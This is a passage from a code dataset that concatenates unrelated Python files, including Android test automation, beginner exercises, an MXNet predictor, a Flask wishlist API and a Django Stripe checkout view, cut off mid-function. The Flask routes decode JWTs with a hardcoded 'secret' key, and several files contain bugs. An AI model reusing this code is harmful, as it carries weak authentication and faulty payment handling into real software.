self.getCurrentPage().getElement(\n alias='net.medlinker.medlinker:id/positive_button', way='id', force=True)\n except Exception:\n pass\n else:\n self.doAction(element=ele, action='click')\n self.arriveSpecMainPage(main=main)\n\n try:\n ele = self.getCurrentPage().getElement(\n alias='net.medlinker.medlinker:id/left_button_layout', way='id', force=True)\n except Exception:\n pass\n else:\n self.doAction(element=ele, action='click')\n self.arriveSpecMainPage(main=main)\n\n def scrollToExact(self, direction, text, element=None, alias=None):\n 
self.__currentPage._scrollToExact(direction=direction, text=text, element=element, alias=alias)\n\n def scrollScreen(self, direction, count=1):\n self.__currentPage.scrollScreen(direction=direction, count=count)\n","sub_path":"UserControlLib/AndroidPhone.py","file_name":"AndroidPhone.py","file_ext":"py","file_size_in_byte":14723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467238002","text":"#Operator overloading\n\na=5\nb='World'\nc=6\n#print(a+b)\nprint(a+c)\nint.__add__(a,c)\na='a'\nb='e'\nstr.__add__(a,b)\n\n\nclass Student:\n def __init__(self,m1,m2):\n self.m1=m1\n self.m2=m2\n\n def __add__(self, other):\n m1=self.m1+other.m1\n m2=other.m2+other.m2\n s3=Student(m1,m2)\n return s3\n def __gt__(self, other):\n s1=self.m1+self.m2\n s2=other.m1+other.m2\n if s1>s2:\n return True\n else:\n return False\n\n def __str__(self):\n return \"{}{}\".format(self.m1,self.m2)\n\ns1=Student(55,65)\ns2=Student(95,99)\n#s3=s1+s2\nif s1>s2:\n print(\"s1 wins\")\nelse:\n print(\"s2 wins\")\n\na=9\nprint(a.__str__())\nprint(s1)\nprint(s1.__str__())\n\n\n","sub_path":"59_Polymorphism.py","file_name":"59_Polymorphism.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612306112","text":"import os\nimport pytest\n\nfrom dynamallow.model import MarshModel\nfrom dynamallow.exceptions import InvalidSchemaField, MissingTableAttribute, MarshModelException\nif 'marshmallow' in (os.getenv('SERIALIZATION_PKG') or ''):\n from marshmallow.fields import String\n from marshmallow.fields import Number\nelse:\n from schematics.types import StringType as String\n from schematics.types import IntType as Number\n\n\ndef test_missing_inner_classes():\n \"\"\"Classes must have both a Table and Schema inner class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n pass\n\n\ndef test_missing_inner_schema_class():\n \"\"\"Classes must have an inner Schema class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n class Table:\n pass\n\n\ndef test_missing_inner_table_class():\n \"\"\"Classes must have an inner Table class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n class Schema:\n pass\n\n\ndef test_table_validation():\n \"\"\"Defining a model with missing table attributes should raise exceptions\"\"\"\n with pytest.raises(MissingTableAttribute):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n\n class Schema:\n foo = String(required=True)\n\n\ndef test_invalid_hash_key():\n \"\"\"Defining a model where ``hash_key`` in Table points to an invalid field should raise InvalidSchemaField\"\"\"\n with pytest.raises(InvalidSchemaField):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n read = 1\n write = 1\n\n class Schema:\n bar = String(required=True)\n\n\ndef test_invalid_range_key():\n \"\"\"Defining a model where ``range_key`` in Table points to an invalid field should raise InvalidSchemaField\"\"\"\n with pytest.raises(InvalidSchemaField):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n range_key = 'bar'\n read = 1\n write = 1\n\n class Schema:\n foo = String(required=True)\n baz = String(required=True)\n\n\ndef test_number_hash_key():\n \"\"\"Test a number hash key and ensure the dynamo type gets set correctly\"\"\"\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n read 
read = 1\n write = 1\n\n class Schema:\n foo = Number(required=True)\n baz = String(required=True)\n\n model = Model(foo=1, baz='foo')\n assert model.Table.attribute_definitions == [{'AttributeName': 'foo', 'AttributeType': 'N'}]\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"54674601","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, division\nimport argparse\nimport caffe\nimport cv2\nimport json\nimport numba\nimport numpy as np\nfrom os.path import dirname, exists, join, splitext\nimport sys\nimport util\nimport time\n\nimport mxnet as mx\n__author__ = 'Bingbing'\n\n\ndef predict(dataset_name, model_prefix, epoch, dev, img_dir, output_dir):\n img_list = open(join(img_dir, 'valImage.lst'), 'r').readlines()\n\n symbol, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, epoch)\n input_shape = (1, 3, 1396, 1396)\n mean_pixel = np.array([72.39, 82.91, 73.16])\n exe = symbol.simple_bind(ctx=dev,data=input_shape)\n for name in exe.arg_dict:\n if name != 'data' and name != 'softmax_label':\n arg_params[name].copyto(exe.arg_dict[name])\n\n for name in exe.aux_dict:\n aux_params[name].copyto(exe.aux_dict[name])\n\n label_margin = 186\n\n batch_size, num_channels, input_height, input_width = input_shape\n caffe_in = np.zeros(input_shape, dtype=np.float32)\n\n t_start = time.time()\n\n for i in xrange(len(img_list)):\n img_name = join(img_dir, img_list[i]).strip()\n image = cv2.imread(img_name, 1).astype(np.float32) - mean_pixel\n image_size = image.shape\n output_height = input_height - 2 * label_margin\n output_width = input_width - 2 * label_margin\n image = cv2.copyMakeBorder(image, label_margin, label_margin,\n label_margin, label_margin,\n cv2.BORDER_REFLECT_101)\n num_tiles_h = image_size[0] // output_height + \\\n (1 if image_size[0] % output_height else 0)\n num_tiles_w = image_size[1] // output_width + \\\n (1 if image_size[1] % output_width else 0)\n prediction = []\n for h in range(num_tiles_h):\n col_prediction = []\n for w in range(num_tiles_w):\n offset = [output_height * h,\n output_width * w]\n tile = image[offset[0]:offset[0] + input_height,\n offset[1]:offset[1] + input_width, :]\n margin = [0, input_height - tile.shape[0],\n 0, input_width - tile.shape[1]]\n tile = cv2.copyMakeBorder(tile, margin[0], margin[1],\n margin[2], margin[3],\n cv2.BORDER_REFLECT_101)\n caffe_in[0] = tile.transpose([2, 0, 1]) # from H*W*3 to 3*H*W\n #caffe_in[:, [0, 2], :, :] = caffe_in[:, [2, 0], :, :] # from BGR to RGB\n exe.arg_dict['data'][0:1, :, :, :] = mx.nd.array(caffe_in, dev)\n out = exe.forward()\n prob = out[0].asnumpy()[0]\n col_prediction.append(prob)\n col_prediction = np.concatenate(col_prediction, axis=2)\n prediction.append(col_prediction)\n prob = np.concatenate(prediction, axis=1)\n\n prediction = np.argmax(prob.transpose([1, 2, 0]), axis=2)\n #color_image = dataset.palette[prediction.ravel()].reshape(image_size)\n #color_image = cv2.cvtColor(color_image, cv2.COLOR_RGB2BGR)\n img_name = img_list[i].split('/')[-1]\n output_path = join(output_dir, splitext(img_name)[0]+'_output.png')\n print('Writing', output_path)\n cv2.imwrite(output_path, prediction)\n\n t_end = time.time()\n m, s = divmod(t_end-t_start, 60)\n h, m = divmod(m, 60)\n d, h = divmod(h, 24)\n print(\"Time: %d days, %d hours, %d minutes, %d seconds\"%(d, h, m, s))\n\n
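# entry point: parses the command-line arguments below and dispatches to predict()\n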
def main():\n parser = argparse.ArgumentParser()\n parser.add_argument('dataset', nargs='?')\n # choices=['pascal_voc', 'camvid', 'kitti', 'cityscapes'])\n parser.add_argument('model_prefix', type=str, default=\"frontend\",\n help=\"the model prefix\")\n parser.add_argument('epoch', type=int, default=1,\n help='the epoch of loaded model parameters')\n parser.add_argument('img_dir', nargs='?', default='',\n help='directory to input images')\n parser.add_argument('output_dir', nargs='?', default='',\n help='directory to output')\n parser.add_argument('--gpu', type=int, default=-1,\n help='If -1 (default), CPU is used')\n\n args = parser.parse_args()\n\n if args.img_dir == '':\n raise IOError('Error: no directory to images')\n if args.gpu >= 0:\n dev = mx.gpu(args.gpu)\n print('Using GPU ', args.gpu)\n else:\n dev = mx.cpu()\n print('Using CPU')\n\n predict(args.dataset, args.model_prefix, args.epoch, dev, args.img_dir, args.output_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"deep_learning/dilation10_by_mxnet/predictSegment.py","file_name":"predictSegment.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215892090","text":"\"\"\"\n Iteration: the process of repeatedly fetching the next element\n Iterable: an object that can take part in iteration\n has an __iter__ method\n Iterator: the object that performs the iteration\n has a __next__ method\n\n\"\"\"\nmessage = \"我是齐天大圣孙悟空\"\n# for item in message:\n# print(item)\n\n# how the for loop works - the iteration process\n# 1. get the iterator object\niterator = message.__iter__()\nwhile True:\n try:\n # 2. fetch the next element\n item = iterator.__next__()\n print(item)\n # 3. when iteration stops, break out of the loop\n except StopIteration:\n break\n# Interview question: what must an object provide to be usable in a for loop?\n# Answer: it must have an __iter__ method (i.e. it must be an iterable)\n\n","sub_path":"fancy_month01/day14_fancy/day14_teacher/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354907736","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('ideas/', views.IdeaListView.as_view(), name='list'),\n path('ideas/<int:pk>/', views.IdeaDetailView.as_view()),\n path('random/', views.IdeaRandomView.as_view()),\n]\n\n","sub_path":"Web/ideasforcodding/ideas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"463328964","text":"from flask import Blueprint\nfrom flask import request\nimport json\nimport jwt\nimport time\nfrom ..services.wishlist_services import add_wishlist, get_wishlist\n\nwishlist = Blueprint('wishlist', __name__)\n\n\n@wishlist.route('/add/<product_id>', methods=['POST'])\n#api to add product to user wishlist\ndef add_user_wishlist(product_id):\n auth_token = request.headers[\"auth_token\"]\n key = 'secret'\n data = jwt.decode(auth_token, key)\n if data[\"expire\"] > time.time():\n x = add_wishlist(data['user_id'], product_id)\n if x:\n return {\"status\": True, \"message\": \"product added to wishlist\"}\n else:\n return {\"status\": False, \"message\": \"server error\"}\n else:\n return{\"status\": True, \"message\": \"timed out\"}\n\n\n@wishlist.route('/')\n#api to get all products in user wishlist\ndef user_wishlist():\n auth_token = request.headers[\"auth_token\"]\n key = 'secret'\n data = jwt.decode(auth_token, key)\n if data[\"expire\"] > time.time():\n x = get_wishlist(data[\"user_id\"])\n if x:\n return{\"status\": True, \"products\": x}\n elif len(x) == 0:\n return {\"status\": True, \"message\": \"No items in wish list\"}\n else:\n return{\"status\": False, \"message\": \"server error\"}\n else:\n return{\"status\": True, \"message\": \"Timed Out\"}\n","sub_path":"flipkart/app/main/routes/wishlist_routes.py","file_name":"wishlist_routes.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609132722","text":"import logging\nfrom time import sleep\nfrom d3a_api_client.aggregator import Aggregator\nfrom d3a_api_client.utils import get_area_uuid_from_area_name_and_collaboration_id\nfrom d3a_api_client.rest_market import RestMarketClient\n\n\nclass TestAggregator(Aggregator):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.is_finished = False\n self.fee_cents_per_kwh = 0\n\n def on_market_cycle(self, market_info):\n \"\"\"\n market_info contains market_info dicts from all markets\n that are controlled by the aggregator\n \"\"\"\n logging.info(f\"AGGREGATOR_MARKET_INFO: {market_info}\")\n if self.is_finished is True:\n return\n if \"content\" not in market_info:\n return\n batch_commands = {}\n self.fee_cents_per_kwh += 1\n logging.info(f\"{market_info}\")\n for area_event in market_info[\"content\"]:\n area_uuid = area_event[\"area_uuid\"]\n if area_uuid is None:\n continue\n if area_uuid not in batch_commands:\n batch_commands[area_uuid] = []\n batch_commands[area_uuid].append({\"type\": \"market_stats\",\n \"data\": {}})\n batch_commands[area_uuid].append({\"type\": \"grid_fees\",\n \"data\": {\"fee_const\": self.fee_cents_per_kwh}})\n if batch_commands:\n response = self.batch_command(batch_commands)\n logging.info(f\"Batch command placed on the new market: {response}\")\n\n def on_tick(self, tick_info):\n logging.debug(f\"Progress information on the device: {tick_info}\")\n\n def on_trade(self, trade_info):\n logging.debug(f\"Trade info: {trade_info}\")\n\n def on_finish(self, finish_info):\n 
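# the simulation has finished; flip the flag so the module-level polling loop at the bottom of this file exits\n 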
self.is_finished = True\n\n\nsimulation_id = \"af779128-04a0-4af4-95a2-d8dc7c63079b\"\ndomain_name = \"http://localhost:8000\"\nwebsocket_domain_name = 'ws://localhost:8000/external-ws'\n\naggr = TestAggregator(\n simulation_id=simulation_id,\n domain_name=domain_name,\n aggregator_name=\"test_aggregator\",\n websockets_domain_name=websocket_domain_name\n)\n\nmarket_args = {\n \"simulation_id\": simulation_id,\n \"domain_name\": domain_name,\n \"websockets_domain_name\": websocket_domain_name\n}\n\nhouse_1_uuid = get_area_uuid_from_area_name_and_collaboration_id(\n market_args[\"simulation_id\"], \"House 1\", market_args[\"domain_name\"])\nmarket_args[\"area_id\"] = house_1_uuid\nhouse_1 = RestMarketClient(\n **market_args\n)\n\nhouse_2_uuid = get_area_uuid_from_area_name_and_collaboration_id(\n market_args[\"simulation_id\"], \"House 2\", market_args[\"domain_name\"])\nmarket_args[\"area_id\"] = house_2_uuid\nhouse_2 = RestMarketClient(\n **market_args\n)\nhouse_1.select_aggregator(aggr.aggregator_uuid)\nhouse_2.select_aggregator(aggr.aggregator_uuid)\n\nwhile not aggr.is_finished:\n sleep(0.5)\n","sub_path":"tests/test_market_aggregator.py","file_name":"test_market_aggregator.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266582763","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport time\nimport click\nimport better_exceptions as be\nfrom flask.cli import FlaskGroup\nfrom utilities.logs import get_logger\nfrom utilities.processes import wait_socket\nfrom restapi import __package__ as current_package\n\nAPP = 'FLASK_APP'\nPORT = 'FLASK_PORT'\n\nlog = get_logger(__name__)\n\n\n@click.group()\n# @click.option('--debug/--no-debug', default=False)\n# def cli(debug):\ndef cli():\n # click.echo('Debug mode is %s' % ('on' if debug else 'off'))\n click.echo('*** RESTful HTTP API ***')\n\n\ndef main(args, another_app=None):\n\n if another_app is not None:\n os.environ[APP] = '%s.py' % another_app\n else:\n current_app = os.environ.get(APP)\n if current_app is None or current_app.strip() == '':\n os.environ[APP] = '%s.__main__' % current_package\n\n cli = FlaskGroup()\n options = {\n 'prog_name': 'restapi',\n 'args': args,\n }\n\n # cannot catch for CTRL+c\n cli.main(**options)\n\n # try:\n # cli.main(**options)\n # except SystemExit as e:\n # if str(e) == \"3\":\n # print(\"AH!\")\n # else:\n # # it looks like there is no Keyboard interrupt with flask\n # log.warning(\"Flask received: system exit\")\n # except BaseException as e:\n # # do not let flask close the application\n # # so we can do more code after closing\n # log.error(e)\n # log.warning('error type: %s' % type(e))\n\n\ndef flask_cli(options=None):\n log.info(\"Launching the app\")\n from restapi.server import create_app\n # log.warning(\"TEST\")\n if options is None:\n options = {'name': 'RESTful HTTP API server'}\n app = create_app(**options)\n app.run(host='0.0.0.0', threaded=True)\n else:\n create_app(**options)\n # app.run(debug=False)\n log.warning(\"Completed\")\n\n\ndef starting_up():\n from utilities import processes\n return processes.find(\n current_package,\n suffixes=['wait', 'init'],\n local_bin=True\n )\n\n\n@cli.command()\n# @click.option(\n# '--wait/--no-wait', default=False, help='Wait for startup to finish')\n# def launch(wait):\ndef launch():\n \"\"\"Launch the RAPyDo-based HTTP API server\"\"\"\n args = [\n 'run',\n '--host', '0.0.0.0',\n '--port', os.environ.get(PORT),\n '--reload',\n '--no-debugger',\n 
'--eager-loading',\n '--with-threads'\n ]\n\n if starting_up():\n log.exit(\"Please wait few more seconds: resources still starting up\")\n else:\n main(args)\n log.warning(\"Server shutdown\")\n\n\n@cli.command()\n@click.option('--services', '-s', multiple=True, default=['postgres'])\ndef verify(services):\n \"\"\"Verify connected service\"\"\"\n from restapi.services.detect import detector\n\n for service in services:\n myclass = detector.services_classes.get(service)\n if myclass is None:\n log.exit(\"Service \\\"%s\\\" was NOT detected\" % service)\n log.info(\"Verifying service: %s\", service)\n host, port = get_service_address(\n myclass.variables, 'host', 'port', service)\n wait_socket(host, port, service)\n\n log.info(\"Completed successfully\")\n\n\n@cli.command()\n@click.option('--wait/--no-wait', default=False, help='Wait for DBs to be up')\ndef init(wait):\n \"\"\"Initialize data for connected services\"\"\"\n if wait:\n mywait()\n\n log.info(\"Initialization requested\")\n flask_cli({'name': 'Initializing services', 'init_mode': True})\n\n\n@cli.command()\ndef wait():\n \"\"\"Wait critical service(s) startup\"\"\"\n mywait()\n\n\ndef get_service_address(variables, host_var, port_var, service):\n\n host = variables.get(host_var)\n # if host is None:\n # log.warning(\"Unable to find HOST variable for %s\", service)\n # for k in myclass.variables:\n # log.critical(myclass.variables)\n # if k.endswith(\"_host\"):\n # host = myclass.variables.get(k)\n # log.info(\"Using %s as HOST variable for %s\", k, service)\n if host is None:\n log.exit(\n \"Cannot find any variable matching %s for %s\", host_var, service)\n\n port = variables.get(port_var)\n # if port is None:\n # log.warning(\"Unable to find PORT variable for %s\", service)\n # for k in myclass.variables:\n # if k.endswith(\"_port\"):\n # port = myclass.variables.get(k)\n # log.info(\"Using %s as PORT variable for %s\", k, service)\n\n if port is None:\n log.exit(\n \"Cannot find any variable matching %s for %s\", port_var, service)\n\n log.debug(\"Checking address: %s:%s\", host, port)\n\n return host, int(port)\n\n\ndef mywait():\n \"\"\"\n Wait for a service on his host:port configuration\n basing the check on a socket connection.\n\n NOTE: this could be packaged as a `waiter` cli utility probably\n p.s. could that be done with rapydo-utils maybe?\n pp.ss. 
could rapydo utils be python 2.7+ compliant?\n \"\"\"\n from restapi.services.detect import detector\n\n for name, myclass in detector.services_classes.items():\n\n if name == 'authentication':\n continue\n\n if name == 'celery':\n host, port = get_service_address(\n myclass.variables, 'broker_host', 'broker_port', name)\n\n wait_socket(host, port, name)\n\n host, port = get_service_address(\n myclass.variables, 'backend_host', 'backend_port', name)\n\n wait_socket(host, port, name)\n else:\n host, port = get_service_address(\n myclass.variables, 'host', 'port', name)\n\n wait_socket(host, port, name)\n\n\n@cli.command()\n@click.confirmation_option(help='Are you sure you want to drop data?')\ndef clean():\n \"\"\"Destroy current services data\"\"\"\n flask_cli({'name': 'Removing data', 'destroy_mode': True})\n\n\n@cli.command()\ndef forced_clean():\n \"\"\"DANGEROUS: Destroy current data without asking yes/no \"\"\"\n flask_cli({'name': 'Removing data', 'destroy_mode': True})\n\n\n@cli.command()\n@click.option(\n '--wait/--no-wait', default=False, help='Wait for startup to finish')\n@click.option(\n '--core/--no-core', default=False,\n help='Test for core instead of vanilla code')\ndef tests(wait, core):\n \"\"\"Compute tests and coverage\"\"\"\n\n if wait:\n while starting_up():\n log.debug('Waiting service startup')\n time.sleep(5)\n\n log.debug(\"Starting unit tests: %s\", be)\n\n # launch unittests and also compute coverage\n # TODO: convert the `pyunittests` script from the docker image into python\n from utilities.basher import BashCommands\n bash = BashCommands()\n log.warning(\n \"Running all tests and computing coverage.\\n\" +\n \"This might take some minutes.\"\n )\n\n # FIXME: does not work\n # use the 'template' dir found in /code\n parameters = []\n # from utilities import helpers\n # basedir = helpers.latest_dir(helpers.current_fullpath())\n if core:\n parameters.append(current_package)\n # import glob\n # if 'template' in glob.glob('*'):\n # from restapi import __package__ as current_package\n # parameters.append(current_package)\n\n output = bash.execute_command(\n \"pyunittests\",\n parameters=parameters, catchException=True, error_max_len=-1)\n\n log.info(\"Completed:\\n%s\", output)\n","sub_path":"restapi/__commands__.py","file_name":"__commands__.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345960880","text":"\nfrom django.http.response import JsonResponse # new\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.generic import ListView, DetailView, View, TemplateView\nfrom .forms import CheckoutForm , CouponForm , RefundForm , PaymentForm\nfrom .models import Item, OrderItem, Order, Address, Payment, Coupon , Refund, UserProfile\nfrom django.utils import timezone\nfrom django.http import HttpResponse, request\nfrom django_countries.templatetags import countries\nfrom django.conf import settings\nimport random\nimport string\nimport stripe\nfrom django.db.models import Q, query # new\n\n\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\n\n# `source` is obtained with 
Stripe.js; see https://stripe.com/docs/payments/accept-a-payment-charges#web-create-token\n\n\n\n# Create your views here.\n\ndef products(request):\n context={\n 'item':Item.objects.all()\n }\n return render(request,'products.html',context)\n\ndef is_valid_form(values):\n valid = True\n for field in values:\n if field=='':\n valid=False\n return valid\n\n\n\nclass checkoutView(View):\n def get(self,*args,**kwargs):\n try:\n order= Order.objects.get(user= self.request.user, ordered=False)\n form= CheckoutForm()\n context={\n 'form':form,\n 'couponform':CouponForm() ,\n 'order':order,\n 'DISPLAY_COUPON_FORM': True\n }\n shipping_address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='S',\n default= True\n )\n if shipping_address_qs.exists():\n context.update({'default_shipping_address':shipping_address_qs[0]})\n\n billing_address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='B',\n default= True\n )\n if billing_address_qs.exists():\n context.update({'default_billing_address':billing_address_qs[0]})\n\n \n return render (self.request, 'checkout.html',context)\n except ObjectDoesNotExist:\n messages.info(self.request,\"You do not have an active order\")\n return redirect(\"core:checkout\")\n\n \n def post(self,*args,**kwargs):\n form= CheckoutForm(self.request.POST or None)\n try:\n order=Order.objects.get(user=self.request.user,ordered=False )\n if form.is_valid():\n\n use_default_shipping= form.cleaned_data.get(\"use_default_shipping\")\n if use_default_shipping:\n print(\"Using default shipping address\")\n address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='S',\n default= True\n )\n if address_qs.exists():\n shipping_address= address_qs[0]\n order.shipping_address= shipping_address\n order.save()\n else:\n messages.info(self.request, \"No default shipping address available!\")\n return redirect(\"core:checkout\")\n else:\n print(\"User entered a new shipping address\")\n\n\n shipping_address1= form.cleaned_data.get(\"shipping_address\")\n shipping_address2=form.cleaned_data.get(\"shipping_address2\")\n shipping_country=form.cleaned_data.get(\"shipping_country\")\n shipping_zip=form.cleaned_data.get(\"shipping_zip\")\n if is_valid_form([shipping_address1,shipping_country, shipping_zip ]):\n \n \n shipping_address= Address(\n user=self.request.user,\n street_address=shipping_address1,\n apartment_address=shipping_address2,\n country=shipping_country,\n zip=shipping_zip,\n address_type=\"S\"\n )\n shipping_address.save()\n order.shipping_address= shipping_address\n order.save()\n set_default_shipping = form.cleaned_data.get(\"set_default_shipping\") \n if set_default_shipping:\n shipping_address.default= True\n shipping_address.save()\n else:\n messages.info(self.request, \"Please fill the required shipping address fields\") \n\n\n use_default_billing= form.cleaned_data.get(\"use_default_billing\")\n same_billing_address= form.cleaned_data.get(\"same_billing_address\")\n\n if same_billing_address:\n billing_address= shipping_address\n billing_address.pk= None \n billing_address.save()\n billing_address.address_type= 'B'\n billing_address.save()\n order.billing_address= billing_address\n order.save()\n\n\n\n elif use_default_billing:\n print(\"Using default billing address\")\n address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='B',\n default= True\n )\n if address_qs.exists():\n billing_address= address_qs[0]\n order.billing_address= billing_address\n order.save()\n else:\n 
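# no saved default billing address to fall back on, so return the user to the checkout form\n 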
messages.info(self.request, \"No default billing address availbale!\")\n return redirect(\"core:checkout\")\n else:\n print(\"User intered a new billing address\")\n\n\n billing_address1= form.cleaned_data.get(\"billing_address\")\n billing_address2=form.cleaned_data.get(\"billing_address2\")\n billing_country=form.cleaned_data.get(\"billing_country\")\n billing_zip=form.cleaned_data.get(\"billing_zip\")\n if is_valid_form([billing_address1,billing_country, billing_zip ]):\n \n \n billing_address= Address(\n user=self.request.user,\n street_address=billing_address1,\n apartment_address=shipping_address2,\n country=billing_country,\n zip=billing_zip,\n address_type=\"B\"\n )\n billing_address.save()\n order.billing_address= billing_address\n order.save()\n set_default_billing = form.cleaned_data.get(\"set_default_billing\") \n if set_default_billing:\n billing_address.default= True\n billing_address.save()\n else:\n messages.info(self.request, \"Please fill the required billing_address fields \") \n\n payment_option=form.cleaned_data.get(\"payment_option\")\n \n\n\n # to do redirect to payment options \n if payment_option== 'S':\n return redirect(\"core:payment\", payment_option='stripe')\n elif payment_option== 'P': \n return redirect(\"core:payment\", payment_option='paypal')\n else:\n messages.warning(self.request, \"Invalid payment option selected!\")\n return redirect(\"core:checkout\")\n\n\n \n messages.warning(self.request, \"Failed Checkout!\")\n return redirect(\"core:checkout\")\n except ObjectDoesNotExist :\n messages.error(\" you dont have an active order \")\n return redirect(\"core:order_summary\")\n\n\nclass PaymentView(View):\n def get(self,*agrs,**kwargs):\n order= Order.objects.get(user=self.request.user, ordered=False)\n if order.billing_address:\n context={\n 'order':order,\n 'DISPLAY_COUPON_FORM ': False\n }\n userprofile=self.request.user.userprofile\n if userprofile.one_click_purchasing:\n cards= stripe.Customer.list_sources(\n userprofile.stripe_customer_id,\n limit=3,\n object='card'\n\n )\n card_list= cards['data']\n if len(card_list) > 0:\n # update the context with the default card \n context.update({\n 'card':card_list[0]\n })\n\n return render(self.request, 'payment.html', context)\n else:\n messages.warning(\" you have not added a billing address! 
\")\n return redirect(\"core:checkout\")\n\n\n def post(self,*agrs,**kwargs):\n order= Order.objects.get(user=self.request.user, ordered=False)\n form = PaymentForm(self.request.POST)\n userprofile= UserProfile.objects.get(user=self.request.user)\n if form.is_valid():\n token=self.request.POST.get('stripetoken')\n save= form.cleaned_data.get(\"save\")\n use_default =form.cleaned_data.get(\"use_default\")\n if save:\n #allow to fetch card\n if not userprofile.stripe_customer_id:\n customer= stripe.Customer.create(\n email= self.request.user.email,\n source=token\n )\n userprofile.stripe_customer_id= customer['id']\n userprofile.one_click_purchasing= True\n userprofile.save()\n else:\n stripe.Customer.create_source(\n userprofile.stripe_customer_id,\n source= token\n\n )\n\n\n amount= int(order.get_total()), # this values is in cents\n\n try:\n if use_default:\n # Use Stripe's library to make requests...\n charge= stripe.Charge.create(\n amount= amount,\n currency=\"EGP\",\n source=token,\n customer=userprofile.stripe_customer_id\n )\n\n else:\n charge= stripe.Charge.create(\n amount= amount,\n currency=\"EGP\",\n source=token,\n \n )\n\n payment=Payment()\n payment.stripe_charge_id= charge['id']\n payment.user= self.request.user\n payment.amount= order.get_total()\n payment.save()\n\n #asign payment to the order\n\n order_items=order.items.all()\n order_items.update(ordered=True)\n for item in order_items:\n item.save()\n\n order.ordered=True\n order.payment= payment\n #TODO: asign ref_code\n order.ref_code = create_ref_code()\n order.save()\n messages.success(\"your order was successful!\")\n return redirect('/')\n except stripe.error.CardError as e:\n # Since it's a decline, stripe.error.CardError will be caught\n body=e.json_body\n err= body.get('error',{})\n messages.warning(self.request, f\"{err.get('message')}\")\n return redirect('/')\n\n \n except stripe.error.RateLimitError as e:\n # Too many requests made to the API too quickly\n messages.warning(self.request, \"RateLimitError\")\n return redirect('/')\n\n except stripe.error.InvalidRequestError as e:\n # Invalid parameters were supplied to Stripe's API\n messages.warning(self.request, \"InvalidRequestError\")\n return redirect('/')\n\n except stripe.error.AuthenticationError as e:\n # Authentication with Stripe's API failed\n # (maybe you cleaned API keys recently)\n messages.warning(self.request, \" Not Authenticated\" )\n return redirect('/')\n\n except stripe.error.APIConnectionError as e:\n # Network communication with Stripe failed\n messages.warning(self.request, \"Network Error\" )\n return redirect('/')\n\n except stripe.error.StripeError as e:\n # Display a very generic error to the user, and maybe send\n # yourself an email\n messages.warning(self.request,\" something went wrong. you were not charged, please try agian. 
\")\n return redirect('/')\n\n except Exception as e:\n # send an email to ourselves\n messages.warning(self.request,\" A serious error occurred \")\n return redirect('/')\n\n \n \n #create the payment\n \n\n\nclass HomeView(ListView):\n model= Item\n paginate_by=8\n template_name='home.html'\n\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self,*args,**kwargs):\n try:\n order=Order.objects.get(user=self.request.user,ordered=False )\n context={\n 'object': order\n }\n return render(self.request,'order_summary.html',context)\n except ObjectDoesNotExist :\n messages.error(\" you dont have an active order \")\n return redirect(\"/\")\n \n \n\nclass ItemDetailView(DetailView):\n model=Item\n template_name='product.html'\n\n\n\n@login_required\ndef add_to_cart(request, slug):\n item = get_object_or_404( Item, slug=slug)\n order_item, create = OrderItem.objects.get_or_create(\n item = item, \n user=request.user,\n ordered=False\n \n \n )\n order_qs=Order.objects.filter(user= request.user, ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item.quantity +=1\n order_item.save()\n messages.info(request,\"this item quantity was updated\")\n return redirect(\"core:order-summary\")\n else:\n \n order.items.add(order_item)\n messages.info(request,\"this item was added to your Cart.\")\n return redirect(\"core:order-summary\" )\n else:\n ordered_date= timezone.now()\n order=Order.objects.create(user= request.user, ordered_date= ordered_date)\n order.items.add(order_item)\n messages.info(request,\"this item was added to your Cart.\")\n return redirect(\"core:order-summary\" )\n\n\n@login_required\ndef remove_from_cart(request,slug):\n item 